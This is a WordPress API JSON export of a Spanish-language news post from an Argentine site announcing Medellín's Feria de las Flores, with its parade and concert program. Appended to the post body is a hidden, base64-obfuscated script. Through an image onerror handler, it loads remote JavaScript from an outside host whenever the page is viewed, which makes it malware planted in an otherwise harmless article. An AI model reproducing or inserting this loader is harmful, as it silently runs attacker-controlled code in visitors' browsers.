{"id":9741,"date":"2025-07-07T11:11:47","date_gmt":"2025-07-07T14:11:47","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9741"},"modified":"2025-08-13T15:26:28","modified_gmt":"2025-08-13T18:26:28","slug":"medellin-se-prepara-para-la-feria-de-las-flores","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9741","title":{"rendered":"Medell\u00edn se prepara para la Feria de las Flores"},"content":{"rendered":"\n<p><strong><em>Del 1 al 10 de agosto, la ciudad se transformar\u00e1 en un escenario lleno de color, tradici\u00f3n, m\u00fasica y cultura<\/em><\/strong><\/p>\n\n\n\n<p>M\u00e1s de 200 eventos p\u00fablicos y privados se tomar\u00e1n las calles, barrios, corregimientos y corazones de propios y visitantes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"457\" height=\"694\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg\" alt=\"\" class=\"wp-image-9688\" style=\"width:213px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg 457w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-198x300.jpeg 198w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-277x420.jpeg 277w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-320x486.jpeg 320w\" sizes=\"(max-width: 457px) 100vw, 457px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-cyan-blue-color\">Publicidad:<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>Lo que no te puedes perder:<\/p>\n\n\n\n<p>Desfile de Silleteros (domingo 10 de agosto): 535 silleteros y silleteras desfilar\u00e1n por la ciudad, incluyendo este a\u00f1o a cinco ni\u00f1os con neurodiversidad.<\/p>\n\n\n\n<p>Avenida Primavera, Autos Cl\u00e1sicos, Chivas y Flores y m\u00e1s desfiles que reunir\u00e1n a cientos de miles de personas.<br>21 tablados musicales en todas las comunas y corregimientos con artistas como Jorge Celed\u00f3n, Jessi Uribe, Arelys Henao, Fruko, \u00d1engo Flow, Guayac\u00e1n y muchos m\u00e1s.&nbsp;<\/p>\n\n\n\n<p>Festival Nacional de la Trova, Parque Cultural Nocturno, Plazas de Flores, Fondas, Desfile de Silleteritos, caminatas, bicis, sancochos\u2026 \u00a1la fiesta es en cada rinc\u00f3n!<\/p>\n\n\n\n<p>Bajo el lema \u201cMedell\u00edn te quiere celebrando lo que somos\u201d, esta edici\u00f3n enaltece nuestras ra\u00edces, promueve la inclusi\u00f3n, y rinde homenaje a las v\u00edctimas del invierno con una cinta negra que portar\u00e1n los silleteros al cierre del desfile.<\/p>\n\n\n\n<p>Fuente: Alcald\u00eda de Medell\u00edn.<\/p>\n<p>\u00a0<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 1 al 10 de agosto, la ciudad se transformar\u00e1 en un escenario lleno de color, tradici\u00f3n, m\u00fasica y cultura M\u00e1s de 200 eventos p\u00fablicos y privados se tomar\u00e1n las calles, barrios, corregimientos y corazones de propios y visitantes. Lo que no te puedes perder: Desfile de Silleteros (domingo 10 de agosto): 535 silleteros y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9742,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-9741","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9741","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9741"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9741\/revisions"}],"predecessor-version":[{"id":9894,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9741\/revisions\/9894"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9742"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9741"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9741"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9741"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}